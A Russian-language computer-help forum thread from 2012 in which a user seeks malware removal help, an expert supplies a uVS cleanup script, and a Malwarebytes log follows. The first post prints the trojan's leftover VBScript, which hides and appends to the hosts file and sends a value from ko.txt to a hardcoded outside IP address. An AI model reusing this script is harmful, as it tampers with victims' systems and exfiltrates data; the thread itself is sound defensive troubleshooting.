08.10.2012, 01:36 | #1 (ссылка) |
Новичок
Регистрация: 17.05.2010
Сообщений: 66
Репутация: 0
|
Жестко тупит комп
Компьютер ужасно висит, не открываются половина сайтов. На rghost еле загрузил файлы (загружаются "через раз").
RSIT скачать не смог. Другие программы для проверки, были уже установлены на компьютере. ЦП загружен на 90-100% постоянно. Подозреваю что причина в cmd.exe и svchost.exe (большая загрузка ЦП). При завершении процесса cmd.exe загрузка ЦП становится 10-20%. Eset Smart Security нашел и удалил файл троян lomay_manya.bat в директории C:\Program Files\j1\j1 От трояна остались файлы ko.txt и test.vbs Содержимое test.vbs Код:
Set oFSO = CreateObject ("Scripting.FileSystemObject") sWinDir = oFSO.GetSpecialFolder (0) 'WScript.Echo sWinDir set fso = CreateObject("Scripting.FileSystemObject") set ts = fso.OpenTextFile(sWinDir+"\System32\drivers\etc\hоsts", 8, true, -2) 'ts.WriteLine "Инфа" ts.CLOSE 'Скрываем файл set fso = CreateObject("Scripting.FileSystemObject") set file = fso.GetFile(sWinDir+"\System32\drivers\etc\hosts") file.Attributes = 2 Const strFilePath = "ko.txt" Dim o Set o = CreateObject("MSXML2.XMLHTTP") Dim fso, objFile, objNewFile, s Set fso = CreateObject("Scripting.FileSystemObject") 'открываем файл для чтения Set objFile = fso.OpenTextFile(strFilePath,1) s=objFile.ReadLine Set o = CreateObject("MSXML2.XMLHTTP") o.open "GET", "http://94.249.190."+"123:45612/stat/tuk/"+s, False o.send Код:
169 AVZ hijackthis ---------- Добавлено в 23:36 ---------- Предыдущее сообщение было написано в 23:17 ---------- Кое как скачал RSIT ) RSIT |
08.10.2012, 02:12 | #2 (ссылка) |
Эксперт
|
Здравствуйте!
Выполните следующий скрипт в uVS: - запускаете программу еще раз, ожидаете пока закончится построения списка (убедитесь что программа извлечена из архива в отдельную папку. не нужно запускать ее из самого архива); - копируете следующий текст из поля "Код" в буфер обмена (выделяете текст мышкой, затем щелкаете правой кнопкой и выбираете Копировать текст); Код:
;;uVS v3.76 script [http://dsrt.dyndns.org] ;Target OS: NTv6.1 delref COPY delall %Sys32%\HALE.EXE delall %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\TEMP\BD84.TMP\HALE.CMD" bl 2D9A30606A718BFDB4E5E9B6C2939881 19968 delall %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\TEMP\BD84.TMP\BUMP.EXE deltmp delnfr restart - скрипт должен автоматически появиться в этом окне. если он не появился или там находится не то что вы скопировали, то удаляете содержимое и вставляете текст скрипта правой кнопкой мыши; - обязательно закрываете все открытые браузеры (Opera, Mozilla, IE), отключаете в антивирусе защиту (обычно правой кнопкой мыши по иконке в трее - Временно отключить защиту или т.п.) и жмете в uVS кнопку Выполнить; - ждете окончания выполнения скрипта в программе. если будут появляться различные запросы на удаление программ, то везде нажимаем кнопки Да или Далее; - по окончанию выполнения скрипта компьютер перезагрузится. - после перезагрузки делаем лог Mbam как написано здесь (можно выполнить быструю проверку, а не полную). программу можно скачать отсюда. ссылку на лог выложить сюда. |
08.10.2012, 03:30 | #3 (ссылка) |
Новичок
Регистрация: 17.05.2010
Сообщений: 66
Репутация: 0
|
Malwarebytes Anti-Malware 1.65.0.1400
www.malwarebytes.org Версия базы данных: v2012.10.07.04 Windows 7 Service Pack 1 x86 NTFS Internet Explorer 9.0.8112.16421 Admin :: ADMIN [администратор] 08.10.2012 2:16:54 mbam-log-2012-10-08 (02-16-54).txt Тип сканирования: Быстрое сканирование Опции сканирования включены: Память | Запуск | Реестр | Файловая система | Эвристика/Дополнительно | Эвристика/Шурикен | PUP | PUM Опции сканирования отключены: P2P Просканированные объекты: 200902 Времени прошло: 10 минут , 27 секунд Обнаруженные процессы в памяти: 0 (Вредоносных программ не обнаружено) Обнаруженные модули в памяти: 0 (Вредоносных программ не обнаружено) Обнаруженные ключи в реестре: 0 (Вредоносных программ не обнаружено) Обнаруженные параметры в реестре: 0 (Вредоносных программ не обнаружено) Объекты реестра обнаружены: 0 (Вредоносных программ не обнаружено) Обнаруженные папки: 1 C:\Recycle.Bin (Trojan.Spyeyes) -> Действие не было предпринято. Обнаруженные файлы: 1 C:\Recycle.Bin\FFCD3CFF47B8880 (Trojan.Spyeyes) -> Действие не было предпринято. (конец) |
08.10.2012, 13:31 | #4 (ссылка) |
Эксперт
Регистрация: 25.05.2011
Сообщений: 9,136
Репутация: 811
|
Удалите найденное в MBAM.
Если проблема решена, выполните скрипт проверки уязвимостей в AVZ. ---------- Добавлено в 12:31 ---------- Предыдущее сообщение было написано в 08:59 ---------- efremovxp, а Вы рекомендации и отсюда тоже выполняете? |
Ads | |
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1) | |
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Комп стал жёстко тормозить!!!((( | JustAs | Неисправности, настройка | 24 | 23.05.2012 11:09 |
жёстко тормозит комп!!!!!(грузится~ 5-7 минут) | osmat | Безопасность | 24 | 06.05.2012 22:27 |
комп тормозит жестко | vaso.21 | Windows XP | 7 | 10.05.2011 07:20 |
Комп тупит жёстко | Антон_! | Неисправности, настройка | 6 | 20.05.2009 17:50 |
Люди у меня комп заглючил!!!!!!!! тормозит жестко!!!!! | Monorox | Windows XP | 10 | 04.04.2009 20:04 |